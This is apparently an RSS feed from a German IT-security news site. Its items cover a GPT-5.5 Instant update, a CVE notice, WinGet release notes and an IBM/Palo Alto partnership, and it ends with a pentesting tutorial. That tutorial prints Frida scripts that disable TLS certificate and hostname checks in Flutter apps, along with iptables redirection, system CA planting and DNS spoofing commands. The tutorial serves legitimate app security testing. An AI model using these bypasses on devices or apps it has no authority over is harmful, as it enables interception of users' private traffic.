structured outputs. Through the Responses API, the <code>chat-latest</code> page also lists support for web search, file search, image generation, code interpreter and MCP.</p><p>The practical takeaway is simple: <code>chat-latest</code> gives developers access to the updated Instant-style behavior, but OpenAI is still steering production API builders toward the separate <code>gpt-5.5</code> model. The broader GPT-5.5 API model includes a larger feature set and different production profile, but that is not the main focus of this update.</p><h2><b>Why this matters for enterprise AI teams</b></h2><p>For enterprises, the June 24 GPT-5.5 Instant update lands at the intersection of two related but distinct trends: better default user experience in ChatGPT, and more reliable orchestration behavior in the API.</p><p>The consumer-facing changes make ChatGPT more useful for everyday decision-making. Users should see better handling of messy, real-world requests: planning a trip with several constraints, comparing products, finding nearby businesses, or adjusting a recommendation after adding a new requirement.</p><p>The enterprise relevance is less about a new technical architecture and more about default behavior. A model that better infers intent, preserves context across turns and follows multi-part constraints can<i> make ChatGPT more reliable for employees using it </i>for research, planning, purchasing decisions, customer-facing drafts and internal analysis.</p><p>But enterprises should remain careful about observability. Memory sources can help users understand why ChatGPT personalized an answer, but they do not provide a complete audit trail. Organizations that already rely on RAG pipelines, vector databases, orchestration logs and internal agent traces should define which record acts as the source of truth when a model’s visible memory sources do not fully match the system’s own logs.</p><h2><b>What’s next?</b></h2><p>The release of GPT-5.5 Instant and the updated <code>chat-latest</code> alias signals a maturation in how generative models are deployed.</p><p>OpenAI is moving away from models that require heavy hand-holding and toward systems that can better infer the user’s goal, preserve constraints and adapt across multiple turns.</p><p>Whether it is a consumer planning a complex multi-city vacation in ChatGPT, or a developer orchestrating a codebase-navigating agent through the API, GPT-5.5 represents a faster, smarter and more capable baseline for the future of AI workflows.</p><p>The most important takeaway for developers is also the simplest: GPT-5.5 Instant, <code>chat-latest</code> and <code>gpt-5.5</code> are related, but they are not the same product surface. GPT-5.5 Instant is the ChatGPT model users experience directly. <code>chat-latest</code> is a moving alias for testing the latest Instant behavior through the API. <code>gpt-5.5</code> is the production model OpenAI recommends for developers building stable applications.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best modern app development tools in 2026: vibe coding and beyond]]></title>
<description><![CDATA[Let's compare the best AI tools for indie developers in 2026, from vibe coding app builders to Mac-native dev utilities.]]></description>
<link>https://tsecurity.de/de/3625355/ios-mac-os/best-modern-app-development-tools-in-2026-vibe-coding-and-beyond/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625355/ios-mac-os/best-modern-app-development-tools-in-2026-vibe-coding-and-beyond/</guid>
<pubDate>Thu, 25 Jun 2026 18:55:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Let's compare the best AI tools for indie developers in 2026, from vibe coding app builders to Mac-native dev utilities.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-61029 | openlink virtuoso-opensource 7.2.11 denial of service (Issue 1228)]]></title>
<description><![CDATA[A vulnerability was found in openlink virtuoso-opensource 7.2.11 and classified as problematic. Affected by this vulnerability is an unknown functionality. Such manipulation leads to denial of service.

This vulnerability is documented as CVE-2025-61029. The attack can be executed remotely. There...]]></description>
<link>https://tsecurity.de/de/3623448/sicherheitsluecken/cve-2025-61029-openlink-virtuoso-opensource-7211-denial-of-service-issue-1228/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623448/sicherheitsluecken/cve-2025-61029-openlink-virtuoso-opensource-7211-denial-of-service-issue-1228/</guid>
<pubDate>Thu, 25 Jun 2026 07:38:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/openlink:virtuoso-opensource">openlink virtuoso-opensource 7.2.11</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is an unknown functionality. Such manipulation leads to denial of service.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2025-61029">CVE-2025-61029</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[6/24/2026]]></title>
<description><![CDATA[Iran-Linked MuddyWater Poses as Ransomware Gang to Mask Cyber Espionage STT, Tata Delhi Data Centre Fire Leaves Clients Fearing Decades of Data Lost; Google Hit Microsoft’s Quantum Computing Technology Called Into Question, Again German Rail Services Resume After Wireless Communications OutageUK’...]]></description>
<link>https://tsecurity.de/de/3623215/it-security-nachrichten/6242026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623215/it-security-nachrichten/6242026/</guid>
<pubDate>Thu, 25 Jun 2026 04:08:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Iran-Linked MuddyWater Poses as Ransomware Gang to Mask Cyber Espionage STT, Tata Delhi Data Centre Fire Leaves Clients Fearing Decades of Data Lost; Google Hit Microsoft’s Quantum Computing Technology Called Into Question, Again German Rail Services Resume After Wireless Communications OutageUK’s Museums and Galleries Left Vulnerable to Cyber-Attack and Theft, MPs WarnAmadey and StealC Malware … <a href="https://thecyberbeat.com/2026/06/25/6-24-2026/" class="more-link">Continue reading <span class="screen-reader-text">6/24/2026</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[IBM, Red Hat, Palo Alto team to secure open-source software]]></title>
<description><![CDATA[IBM, its RedHat subsidiary, and Palo Alto Networks are teaming up to help enterprises identify vulnerabilities in open-source software and deploy safeguards against threats, particularly those generated by AI.



The joint effort will rely on Palo Alto’s network-based virtual patching technology,...]]></description>
<link>https://tsecurity.de/de/3622647/it-security-nachrichten/ibm-red-hat-palo-alto-team-to-secure-open-source-software/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622647/it-security-nachrichten/ibm-red-hat-palo-alto-team-to-secure-open-source-software/</guid>
<pubDate>Wed, 24 Jun 2026 21:38:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>IBM, its RedHat subsidiary, and <a href="https://www.networkworld.com/article/4089591/arista-palo-alto-bolster-ai-data-center-security.html">Palo Alto Networks</a> are teaming up to help enterprises identify vulnerabilities in open-source software and deploy safeguards against threats, particularly those generated by <a href="https://www.networkworld.com/article/4089591/arista-palo-alto-bolster-ai-data-center-security.html">AI</a>.</p>



<p>The joint effort will rely on Palo Alto’s network-based virtual patching technology, which is found in its <a href="https://www.networkworld.com/article/4084195/palo-alto-networks-readies-security-for-ai-first-world.html">Prisma security software</a>, and IBM/Red Hat’s Project Lightwell, a software remediation initiative designed to help enterprises secure open-source software. Vulnerability intelligence from both vendors will also contribute to threat detection and remediation, the companies stated.  </p>



<p>Announced in May, <a href="https://newsroom.ibm.com/2026-05-28-ibm-and-red-hat-commit-5-billion-to-redefine-the-future-of-open-source-in-the-ai-era">Project Lighthouse</a> is IBM and Red Hat’s $5 billion project to develop what IBM calls a “trusted enterprise clearinghouse combined with a global force of engineers to identify and fix vulnerabilities at scale.”</p>



<p>“The clearinghouse will serve as a security coordination layer, using advanced AI capabilities to validate and test fixes across an unprecedented volume of open source code,” IBM stated in May. “These capabilities will be offered through commercial subscriptions, allowing enterprises to integrate secure patches directly into their existing software supply chains with enterprise-grade validation and lifecycle management.”</p>



<p>Open-source software (OSS) underpins modern enterprise infrastructure, with more than 90% of Fortune 500 companies relying on OSS, IBM stated, citing a <a href="https://worldmetrics.org/opensource-statistics/">Worldmetric</a> study.</p>



<p>IBM and Red Hat said they are working with a variety of early adopters on Project Lightwell, including Bank of America, BNY, Citi, Goldman Sachs, JPMorgan Chase, Mastercard, Morgan Stanley, RBC, State Street, Visa and Wells Fargo.</p>



<p>Key elements of the Palo Alto/IBM/Red Hat initiative include:</p>



<ul class="wp-block-list">
<li><strong>Vulnerability coverage: </strong>Protection across open-source software, commercial applications, operational technology environments, and connected devices.</li>



<li><strong>Preemptive coverage: </strong>Organizations can receive virtual patch protections before official software patches become available, helping reduce exposure while remediation is underway.</li>



<li><strong>Rapid protection</strong>: When a new vulnerability is discovered, network-level protections can be deployed the same day, with a long-term goal of reducing the time from validated discovery to protection.   </li>
</ul>



<p>The companies said they also plan to establish secure processes for sharing vulnerability information across participating software vendors, technology providers, and security teams. The idea is to accelerate protection development and provide anonymized telemetry on real-world exploitation attempts, the companies stated.</p>



<p>“AI has compressed the window between vulnerability discovery and exploit from weeks to minutes. Traditional patching cannot keep pace,” said Nikesh Arora, CEO and chairman of Palo Alto Networks, in a statement. “By collaborating with IBM and Red Hat, we are shifting the advantage back to defenders. This powerful combination allows us to neutralize threats in the network while providing uninterrupted business continuity for our global clients.”</p>



<p>IBM and Palo Alto have a long-running relationship of integrating security and enterprise-class networks. Recently, IBM and Palo Alto said they would combine to offer a service, <a href="https://www.paloaltonetworks.com/company/press/2025/palo-alto-networks-and-ibm-plan-to-launch-joint-solution-to-accelerate-enterprise-wide-quantum-safe-readiness">Quantum-Safe Readiness</a>, that would let enterprise customers identify cryptographic exposure, understand <a href="https://www.networkworld.com/article/4131660/ibm-research-when-ai-and-quantum-merge.html">quantum-computing</a> related risks, and accelerate their use of quantum-safe security technology.</p>



<p>In addition, the companies <a href="https://www.ibm.com/new/announcements/introducing-the-rapid-ai-security-assessment-secure-your-ai-innovation-with-ibm-and-palo-alto-networks">earlier this year</a> said they would combine to offer a service designed to help enterprises discover, assess, and prioritize security and compliance risks for their artificial intelligence implementations in the cloud.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Package Manager 1.29.280]]></title>
<description><![CDATA[This is a release candidate of Windows Package Manager v1.29. If you find any bugs or problems, please help us out by filing an issue.
New in v1.29
New Feature: Source Priority
NoteExperimental under sourcePriority; defaulted to disabled.

With this feature, one can assign a numerical priority to...]]></description>
<link>https://tsecurity.de/de/3622589/downloads/windows-package-manager-129280/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622589/downloads/windows-package-manager-129280/</guid>
<pubDate>Wed, 24 Jun 2026 21:02:04 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This is a release candidate of Windows Package Manager v1.29. If you find any bugs or problems, please help us out by <a href="https://github.com/microsoft/winget-cli/issues">filing an issue</a>.</p>
<h2>New in v1.29</h2>
<h1>New Feature: Source Priority</h1>
<div class="markdown-alert markdown-alert-note"><p class="markdown-alert-title"><svg data-component="Octicon" class="octicon octicon-info mr-2" viewbox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="M0 8a8 8 0 1 1 16 0A8 8 0 0 1 0 8Zm8-6.5a6.5 6.5 0 1 0 0 13 6.5 6.5 0 0 0 0-13ZM6.5 7.75A.75.75 0 0 1 7.25 7h1a.75.75 0 0 1 .75.75v2.75h.25a.75.75 0 0 1 0 1.5h-2a.75.75 0 0 1 0-1.5h.25v-2h-.25a.75.75 0 0 1-.75-.75ZM8 6a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg>Note</p><p>Experimental under <code>sourcePriority</code>; defaulted to disabled.</p>
</div>
<p>With this feature, one can assign a numerical priority to sources when added or later through the <code>source edit</code><br>
command. Sources with higher priority are sorted first in the list of sources, which results in them getting put first<br>
in the results if other things are equal.</p>
<div class="markdown-alert markdown-alert-tip"><p class="markdown-alert-title"><svg data-component="Octicon" class="octicon octicon-light-bulb mr-2" viewbox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="M8 1.5c-2.363 0-4 1.69-4 3.75 0 .984.424 1.625.984 2.304l.214.253c.223.264.47.556.673.848.284.411.537.896.621 1.49a.75.75 0 0 1-1.484.211c-.04-.282-.163-.547-.37-.847a8.456 8.456 0 0 0-.542-.68c-.084-.1-.173-.205-.268-.32C3.201 7.75 2.5 6.766 2.5 5.25 2.5 2.31 4.863 0 8 0s5.5 2.31 5.5 5.25c0 1.516-.701 2.5-1.328 3.259-.095.115-.184.22-.268.319-.207.245-.383.453-.541.681-.208.3-.33.565-.37.847a.751.751 0 0 1-1.485-.212c.084-.593.337-1.078.621-1.489.203-.292.45-.584.673-.848.075-.088.147-.173.213-.253.561-.679.985-1.32.985-2.304 0-2.06-1.637-3.75-4-3.75ZM5.75 12h4.5a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1 0-1.5ZM6 15.25a.75.75 0 0 1 .75-.75h2.5a.75.75 0 0 1 0 1.5h-2.5a.75.75 0 0 1-.75-.75Z"></path></svg>Tip</p><p>Search result ordering in winget is currently based on these values in this order:</p>
<ol>
<li>Match quality (how well a valid field matches the search request)</li>
<li>Match field (which field was matched against the search request)</li>
<li>Source order (was always relevant, but with priority you can more easily affect this)</li>
</ol>
</div>
<p>Beyond the ability to slightly affect the result ordering, commands that primarily target available packages<br>
(largely <code>install</code>) will now prefer to use a single result from a source with higher priority rather than prompting for<br>
disambiguation from the user. Said another way, if multiple sources return results but only one of those sources has<br>
the highest priority value (and it returned only one result) then that package will be used rather than giving a<br>
"multiple packages were found" error. This has been applied to both winget CLI and PowerShell module commands.</p>
<h3>REST result match criteria update</h3>
<p>Along with the source priority change, the results from REST sources (like <code>msstore</code>) now attempt to correctly set the<br>
match criteria that factor into the result ordering. This will prevent them from being sorted to the top automatically.</p>
<h2>Minor Features</h2>
<h3>Preserve installer arguments across export and import</h3>
<p><code>winget export</code> now captures the <code>--override</code> and <code>--custom</code> arguments that were used when a package was originally installed and saves them into the export file. When subsequently running <code>winget import</code>, those values are automatically re-applied during installation — <code>--override</code> replaces all installer arguments and <code>--custom</code> appends extra switches — so packages can be reinstalled with the same customizations without any manual intervention. Both fields are optional and independent of each other; packages without stored installer arguments are unaffected.</p>
<h3>--no-progress flag</h3>
<p>Added a new <code>--no-progress</code> command-line flag that disables all progress reporting (progress bars and spinners). This flag is universally available on all commands and takes precedence over the <code>visual.progressBar</code> setting. Useful for automation scenarios or when running WinGet in environments where progress output is undesirable.</p>
<h3>MCP <code>upgrade</code> support</h3>
<p>The WinGet MCP server's existing tools have been extended with new parameters to support upgrade scenarios:</p>
<ul>
<li><strong><code>find-winget-packages</code></strong> now accepts an <code>upgradeable</code> parameter (default: <code>false</code>). When set to <code>true</code>, it lists only installed packages that have available upgrades — equivalent to <code>winget upgrade</code>. The <code>query</code> parameter becomes optional in this mode, allowing it to filter results or be omitted to list all upgradeable packages. AI agents can use this to answer requests like "What apps can I update with WinGet?"</li>
<li><strong><code>install-winget-package</code></strong> now accepts an <code>upgradeOnly</code> parameter (default: <code>false</code>). When set to <code>true</code>, it only upgrades an already-installed package and returns a clear error if the package is not installed (pointing to <code>install-winget-package</code> without <code>upgradeOnly</code> instead). AI agents can use this to answer requests like "Update WinGetCreate" or, in combination with <code>find-winget-packages</code> with <code>upgradeable=true</code>, "Update all my apps."</li>
</ul>
<h3>Authenticated GitHub API requests in PowerShell module</h3>
<p>The PowerShell module now automatically uses <code>GH_TOKEN</code> or <code>GITHUB_TOKEN</code> environment variables to authenticate GitHub API requests. This significantly increases the GitHub API rate limit, preventing failures in CI/CD pipelines. Use <code>-Verbose</code> to see which token is being used.</p>
<h3>Default priority of installer types</h3>
<p>Installer type selection no longer depends on the order defined on the manifest. Instead, preference is given in this order:</p>
<ul>
<li>MSIX</li>
<li>MSI / Wix / Burn</li>
<li>Nullsoft / Inno / EXE</li>
<li>Portable</li>
</ul>
<p>When a user configures installer type requirements or preferences, the order in which they are listed is now respected during installer selection.</p>
<h3>Improved <code>list</code> output when redirected</h3>
<ul>
<li><code>winget list</code> (and similar table commands) no longer truncates output when stdout is redirected to a file or variable — column widths are now computed from the full result set.</li>
<li>Spinner and progress bar output are suppressed when no console is attached, keeping redirected output clean.</li>
</ul>
<h3>Log file naming strategy</h3>
<p>Added a user setting (<code>logging.fileNameStrategy</code>) for controlling the default naming strategy for installer log files. Supported values are <code>manifest</code> (default), <code>timestamp</code>, <code>guid</code>, and <code>shortguid</code>. Only applies to logs generated by installers if the installer itself supports the logging switch / parameter.</p>
<table>
<thead>
<tr>
<th>Setting</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>manifest</td>
<td>Uses the name of the manifest and a timestamp. Has the same behavior as WinGet 1.28</td>
</tr>
<tr>
<td>timestamp</td>
<td>The log name is just a timestamp</td>
</tr>
<tr>
<td>guid</td>
<td>The log name is a GUID</td>
</tr>
<tr>
<td>shortguid</td>
<td>The log name is the first 8 characters of a GUID</td>
</tr>
</tbody>
</table>
<h3>Sortable <code>list</code> output</h3>
<p><code>winget list</code> now supports sorting results via <code>--sort &lt;field&gt;</code> (repeatable for multi-field sorting), <code>--ascending</code>/<code>--descending</code> direction flags, and a persistent <code>output.sortOrder</code> setting. Available sort fields: <code>name</code>, <code>id</code>, <code>version</code>, <code>source</code>, <code>available</code>, <code>relevance</code>. By default, results are sorted alphabetically by name when no query is present; use <code>--sort relevance</code> to preserve the previous source-determined ordering.</p>
<h2>Bug Fixes</h2>
<ul>
<li><code>winget export</code> now works when the destination path is a hidden file</li>
<li>Fixed the <code>useLatest</code> property in the DSC v3 <code>Microsoft.WinGet/Package</code> resource schema to emit a boolean default (<code>false</code>) instead of the incorrect string <code>"false"</code>.</li>
<li><code>SignFile</code> in <code>WinGetSourceCreator</code> now supports an optional RFC 3161 timestamp server via the new <code>TimestampServer</code> property on the <code>Signature</code> model. When set, <code>signtool.exe</code> is called with <code>/tr &lt;url&gt; /td sha256</code>, embedding a countersignature timestamp so that signed packages remain valid after the signing certificate expires.</li>
<li>File and directory paths passed to <code>signtool.exe</code> and <code>makeappx.exe</code> are now quoted, fixing failures when paths contain spaces.</li>
<li>DSC export now correctly exports WinGet Admin Settings</li>
<li><code>winget validate</code> now performs case-insensitive comparison for file extensions where applicable</li>
<li><code>winget source reset</code> now properly resets default sources instead of removing them</li>
<li>DSC v3 <code>Microsoft.WinGet/Package</code> resource now honors the <code>installMode</code> property to use silent or interactive installer switches as specified</li>
<li>Fixed a crash (<code>0x8000ffff</code>) when using <code>--disable-interactivity</code> with the Resume experimental feature enabled during install operations.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>[1.29] Fix crash with --disable-interactivity and EFResume by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4703209083" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6303" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6303/hovercard" href="https://github.com/microsoft/winget-cli/pull/6303">#6303</a></li>
<li>Fix configuration elevation validation for standard flow (1.29) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721041944" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6318" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6318/hovercard" href="https://github.com/microsoft/winget-cli/pull/6318">#6318</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/microsoft/winget-cli/compare/v1.29.250...v1.29.280"><tt>v1.29.250...v1.29.280</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Inklusion bei Digitalen Projekten (tdf2026)]]></title>
<description><![CDATA[Gerade bei Opensource Projekten wird die Inklusion und die barrierefreiheit oftmals vernachlässigt. Ich möchte hier Tipps geben wie man die barrierefreiheit mit einfachen Mitteln verbessern kann.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://...]]></description>
<link>https://tsecurity.de/de/3622556/it-security-video/inklusion-bei-digitalen-projekten-tdf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622556/it-security-video/inklusion-bei-digitalen-projekten-tdf2026/</guid>
<pubDate>Wed, 24 Jun 2026 20:50:14 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Gerade bei Opensource Projekten wird die Inklusion und die barrierefreiheit oftmals vernachlässigt. Ich möchte hier Tipps geben wie man die barrierefreiheit mit einfachen Mitteln verbessern kann.

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.cttue.de/tdf5/talk/AA8XA3/]]></content:encoded>
</item>
<item>
<title><![CDATA[I Wasted 3 Days Intercepting a Flutter App. Here’s What Actually Works.]]></title>
<description><![CDATA[Three days. That’s how long it took me to get Burp Suite seeing traffic from a Flutter app during a security assessment.I tried everything I knew. Objection. ReFlutter, which actually patches the Flutter binary itself. Custom CA installation. VPN-based interception. Standard Frida SSL bypass scri...]]></description>
<link>https://tsecurity.de/de/3621794/hacking/i-wasted-3-days-intercepting-a-flutter-app-heres-what-actually-works/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621794/hacking/i-wasted-3-days-intercepting-a-flutter-app-heres-what-actually-works/</guid>
<pubDate>Wed, 24 Jun 2026 16:55:14 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*K8PC8q14WKtGzOCpXufO_g.png"></figure><p>Three days. That’s how long it took me to get Burp Suite seeing traffic from a Flutter app during a security assessment.</p><p>I tried everything I knew. Objection. ReFlutter, which actually patches the Flutter binary itself. Custom CA installation. VPN-based interception. Standard Frida SSL bypass scripts from GitHub. Each one either failed silently or gave me the exact same result: app opens, appears to load, shows “no internet.” Not an SSL error. Not a certificate warning. Just “no internet,” like the proxy wasn’t even there.</p><p>At some point I stopped trying individual tools and started asking a different question: what is actually happening at each layer, and why is patching one thing not enough? That’s when things started making sense.</p><p>What eventually worked wasn’t a new tool or a clever trick. It was running all the right hooks at the same time, covering every SSL validation path the app could be using. I put those together into two scripts. That’s what this post is about.</p><h3>Why Flutter Makes This Harder Than It Should Be</h3><p>Most Android SSL bypass guides assume Java or Kotlin. Flutter is built differently.</p><p>Flutter ships its own TLS implementation, BoringSSL, compiled directly into libflutter.so. It has nothing to do with Android's certificate trust chain. Installing Burp's CA through Settings, the first thing every guide tells you to do, has zero effect on Flutter's networking. The app just doesn't use that trust store.</p><p>That’s the first problem. The second one is subtler. Even if you patch Flutter’s TLS correctly, some apps run a connectivity check through a Java or WebView layer before Flutter even initializes. That check goes through Android’s certificate chain, which on API 24 and above won’t trust user-installed CAs. So the Flutter bypass works, the Flutter layer is satisfied, and the app still shows “no internet” because the Java layer already rejected the connection a few milliseconds earlier.</p><p>This is exactly why ReFlutter wasn’t enough. It patches the Flutter binary, full stop. If anything is happening outside Flutter, in Java or WebView, ReFlutter never touches it.</p><p>Covering one layer doesn’t work. You have to cover all of them.</p><h3>The Scripts</h3><h3>Script 1: disable-flutter-tls-v1.js</h3><p>This one handles the Flutter TLS layer.</p><p>Flutter’s BoringSSL has a function called ssl_verify_peer_cert in handshake.cc that does the actual peer certificate verification. The script finds this function in memory using byte pattern matching. It has patterns for arm64, arm, x64, and x86 across both Android and iOS. Once it finds the function, it replaces the implementation with one that always returns 0, meaning every certificate passes without any check.</p><pre>function hook_ssl_verify_peer_cert(address) {<br>    Interceptor.replace(address, new NativeCallback((pathPtr, flags) =&gt; {<br>        return 0;<br>    }, 'int', ['pointer', 'int']));<br>}</pre><p>There’s a timing problem that causes silent failures on a lot of devices. Frida attaches to the process before libflutter.so finishes loading. Pattern matching runs, finds nothing, exits cleanly, and you see no error, but the bypass never actually happened. The script handles this by retrying up to five times with a one-second delay between attempts. Once the library is found, the retry counter resets so the pattern search also gets its full number of attempts.</p><h3>Script 2: universal_bypass.js</h3><p>This one covers everything in the Java layer, outside Flutter’s Dart runtime.</p><p><strong>X509TrustManager</strong> is Android’s standard interface for certificate validation. The script registers a custom implementation where checkClientTrusted, checkServerTrusted, and getAcceptedIssuers are all empty. No certificate chain ever gets checked.</p><pre>var TrustManager = Java.registerClass({<br>    name: 'com.burp.bypass.TrustManager',<br>    implements: [X509TrustManager],<br>    methods: {<br>        checkClientTrusted: function(chain, authType) {},<br>        checkServerTrusted: function(chain, authType) {},<br>        getAcceptedIssuers: function() { return []; }<br>    }<br>});</pre><p><strong>SSLContext.init()</strong> gets hooked so that every SSL context created anywhere in the app, including inside third-party libraries, gets the bypass trust manager injected into it at initialization time.</p><p><strong>HostnameVerifier</strong> is hooked to return true for every hostname. Some apps validate the server hostname as a completely separate step from certificate validation. Without this, you can pass the certificate check and still get blocked.</p><p><strong>WebViewClient.onReceivedSslError</strong> calls handler.proceed() instead of showing an error page. Without this, any WebView inside the app will just stop loading when Burp intercepts the connection.</p><p><strong>InAppWebViewClient</strong> is the hook that was missing from every existing script I found. Apps using the flutter_inappwebview plugin register their own WebView client subclass at com.pichillilorenzo.flutter_inappwebview_android.webview.in_app_webview.InAppWebViewClient. Hooking the parent WebViewClient class does nothing for this subclass. You have to hook it by its full name specifically.</p><pre>try {<br>    var InAppWebViewClient = Java.use('com.pichillilorenzo.flutter_inappwebview_android.webview.in_app_webview.InAppWebViewClient');<br>    InAppWebViewClient.onReceivedSslError.implementation = function(view, handler, error) {<br>        handler.proceed();<br>    };<br>} catch(e) {<br>    console.log("[-] InAppWebView not present: " + e);<br>}</pre><p>The try/catch exists because if the app doesn’t use flutter_inappwebview, that class simply doesn’t exist. A bare Java.use() call on a missing class crashes the entire script before any other hook runs. The catch keeps everything else alive.</p><h3>Running both scripts</h3><pre>frida -U -f com.your.app.package -l ./disable-flutter-tls-v1.js -l ./universal_bypass.js</pre><p>If the app freezes after launch, type %resume in the Frida REPL to unpause it. If you attached to an already running process, skip this — there's nothing to resume.</p><p>Watch the output. The Flutter script will log which byte pattern matched and at what address. The Java script logs each hook as it fires. Traffic should start showing up in Burp within a few seconds of the app making its first network request.</p><p>On most Flutter apps I’ve tested, this is enough. Try it before going any further.</p><h3>When the Scripts Are Not Enough</h3><p>A small number of apps ignore system routing or have extra checks at the network level. For those, you need the traffic path set up correctly underneath the scripts.</p><h3>Burp Invisible Proxy</h3><p>When iptables redirects traffic to Burp, the app sends raw TCP directly, no CONNECT handshake. Without invisible proxy mode, Burp doesn’t know how to handle this and logs “Client request violates HTTP protocol” while showing nothing in Intercept.</p><p>Go to Proxy, then Proxy Listeners, select your listener, click Edit, go to Request handling, and enable Support invisible proxying. Leave Redirect to host empty.</p><p>Also worth checking: make sure Burp is actually binding to all interfaces.</p><pre>netstat -an | grep 8080<br># 0.0.0.0:8080 is correct. 127.0.0.1:8080 means the emulator can't reach it.</pre><h3>iptables Traffic Redirection</h3><p>Flutter apps make direct TCP connections and ignore Android’s proxy settings entirely. iptables handles the redirect at the kernel level, rewriting the destination address before the packet leaves the device.</p><pre>adb reverse --remove-all<br>adb shell su -c 'iptables -t nat -F'</pre><pre>adb shell su -c 'iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 10.0.2.2:8080'<br>adb shell su -c 'iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 10.0.2.2:8080'</pre><pre>adb shell su -c 'iptables -t nat -L -n -v'</pre><p>Always flush before adding rules. Duplicate DNAT entries stack silently and the routing behavior they produce is not obvious.</p><h3>Burp’s CA as a System Certificate</h3><p>If there’s Java-level certificate validation that Frida doesn’t catch in time, Burp’s CA needs to be in the system store. User-installed certificates are ignored on API 24 and above. The bind mount approach gets around the read-only partition:</p><pre>openssl x509 -inform DER -in cacert.der -out cacert.pem<br>openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1<br># e.g. 9a5ba575, so the file must be named 9a5ba575.0</pre><pre>adb shell su -c 'cp -a /system/etc/security/cacerts /data/local/tmp/system_cacerts'<br>adb push cacert.pem /data/local/tmp/system_cacerts/<br>adb shell su -c 'mv /data/local/tmp/system_cacerts/cacert.pem /data/local/tmp/system_cacerts/9a5ba575.0'<br>adb shell su -c 'chmod 644 /data/local/tmp/system_cacerts/9a5ba575.0'<br>adb shell su -c 'mount -o bind /data/local/tmp/system_cacerts /system/etc/security/cacerts'</pre><h3>DNSChef: When iptables Still Isn’t Enough</h3><p>On a handful of apps, even the full iptables setup wasn’t getting traffic into Burp. The tell was tcpdump: packets were leaving the device on port 443 going somewhere other than Burp. The app was doing something at the network level that DNAT wasn’t catching.</p><p><a href="https://github.com/iphelix/dnschef">DNSChef</a> takes a completely different approach. Instead of redirecting traffic after DNS resolution happens, you intercept the DNS resolution itself. Point the device’s DNS server at your machine, run DNSChef to answer every query with your IP, and the app’s traffic arrives at Burp before iptables even has to act.</p><pre>adb shell settings put global dns1 &lt;your-machine-ip&gt;<br>adb shell settings put global dns2 &lt;your-machine-ip&gt;</pre><pre>sudo python dnschef.py --fakeip &lt;your-machine-ip&gt; --interface &lt;your-machine-ip&gt;</pre><p>Then run the Frida scripts on top:</p><pre>frida -U -f com.your.app.package -l ./disable-flutter-tls-v1.js -l ./universal_bypass.js</pre><p>If the app freezes, type %resume in the REPL. Skip it if you attached to a running process.</p><p>With everything running, the app resolves its backend domain and gets your machine’s IP back. It sends HTTPS there. Burp picks it up in invisible proxy mode. Frida has already patched TLS validation so the app accepts Burp’s certificate. The app has no visibility into any of it.</p><p>I’ve needed this combination maybe twice. Both times tcpdump was what showed me why iptables alone wasn’t doing it.</p><h3>If Things Still Aren’t Working</h3><p>Check the Burp Event 